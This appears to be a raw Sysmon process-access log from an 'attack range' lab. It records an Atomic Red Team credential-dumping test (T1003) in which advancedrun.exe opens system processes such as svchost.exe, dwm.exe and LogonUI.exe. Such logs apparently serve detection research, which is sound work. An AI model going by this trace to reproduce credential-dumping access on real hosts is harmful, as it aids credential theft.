17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953140Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953139Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953138Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953136Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003953135Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953134Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953133Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953132Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953131Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953130Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953129Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003953126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
